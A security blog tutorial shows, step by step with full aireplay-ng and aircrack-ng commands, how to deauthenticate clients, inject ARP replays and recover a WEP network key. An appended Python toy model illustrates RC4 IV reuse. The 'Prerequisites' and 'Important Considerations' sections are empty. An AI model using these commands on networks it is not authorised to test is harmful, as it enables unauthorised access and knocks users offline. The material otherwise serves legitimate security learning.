Blog | G5 Cyber Security

WEP Cracking with Aircrack-ng: ARP Replay

TL;DR

This guide shows you how to crack a WEP key using ARP replay attacks within the Aircrack-ng suite. It’s an older method, but useful for understanding WEP vulnerabilities and practicing cyber security skills in a controlled environment.

Prerequisites

Steps

  1. Put your wireless interface into monitor mode. This allows it to capture all wireless traffic, not just packets addressed to it.
    sudo airmon-ng start wlan0

    This will usually create a new interface like wlan0mon. Use this interface for the following steps.

  2. Identify your target network. Use Airodump-ng to scan for nearby wireless networks and find the BSSID (MAC address) of your target WEP network.
    sudo airodump-ng wlan0mon

    Note down the BSSID, channel number, and ESSID (network name).

  3. Capture traffic on the target network. Airodump-ng will capture packets from the specified channel.
    sudo airodump-ng -c <channel_number> --bssid <BSSID> wlan0mon -w capture

    Replace <channel_number> and <BSSID> with the values you noted in step 2. The -w capture option saves the captured packets to files starting with ‘capture’.

  4. Deauthenticate a client (optional, but speeds up the process). Sending deauthentication packets forces clients to reconnect, generating more traffic.
    sudo aireplay-ng -0 1 -a <BSSID> -c <client_MAC_address> wlan0mon

    Replace <BSSID> with the target network’s BSSID and <client_MAC_address> with a client connected to that network (found in Airodump-ng output). Repeat this several times.

  5. Perform an ARP replay attack. This sends spoofed ARP requests, generating more IVs (Initialisation Vectors) which are needed for cracking the key.
    sudo aireplay-ng -3 -b <BSSID> -h <client_MAC_address> wlan0mon

    Replace <BSSID> with the target network’s BSSID and <client_MAC_address> with a client MAC address. Let this run for several minutes, or until you have enough IVs (at least 20,000-50,000 is recommended).

  6. Crack the WEP key. Use Aircrack-ng to attempt to crack the captured packets.
    sudo aircrack-ng capture*.cap

    Aircrack-ng will analyze the .cap files and attempt to recover the WEP key. If successful, it will display the key in various formats (hexadecimal, ASCII).

  7. Stop monitor mode once you’ve finished capturing traffic.
    sudo airmon-ng stop wlan0mon
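Why the IV count in step 5 matters, as an added educational example (Python, not from the original post): WEP keys each frame's RC4 stream with a 24-bit cleartext IV prepended to the shared key, so any two frames that repeat an IV are encrypted with the same keystream and their XOR leaks the XOR of their plaintexts. The toy model below uses a constructed key, IV and frame contents, and a birthday-bound estimate of how quickly IVs start repeating.

```python
# Added example (not from the original post): toy model of WEP per-packet
# keying, RC4(IV || key). Key, IV and frame contents are constructed.
import math

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4 KSA + PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP-style body encryption: RC4 keyed with IV || key (ICV omitted)."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    ks = rc4_keystream(iv + key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def iv_reuse_leaks_plaintext_xor(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """True when C1 xor C2 == P1 xor P2, i.e. the shared keystream cancelled out."""
    c1, c2 = wep_encrypt(iv, key, p1), wep_encrypt(iv, key, p2)
    return xor_bytes(c1, c2) == xor_bytes(p1, p2)

def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday-bound approximation of P(at least one repeated IV) after
    `frames` frames whose IVs are drawn uniformly from a 2**iv_bits space."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * 2 ** iv_bits))

if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"  # constructed 40-bit WEP key
    iv = b"\x0a\x0b\x0c"           # constructed IV
    p1, p2 = b"ARP who-has 10.0.0.1", b"ARP who-has 10.0.0.2"
    print("IV reuse leaks P1 xor P2:", iv_reuse_leaks_plaintext_xor(key, iv, p1, p2))
    for n in (1000, 5000, 20000):
        print(n, "frames -> P(IV repeat) ~", round(iv_collision_probability(n), 3))
```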

Important Considerations
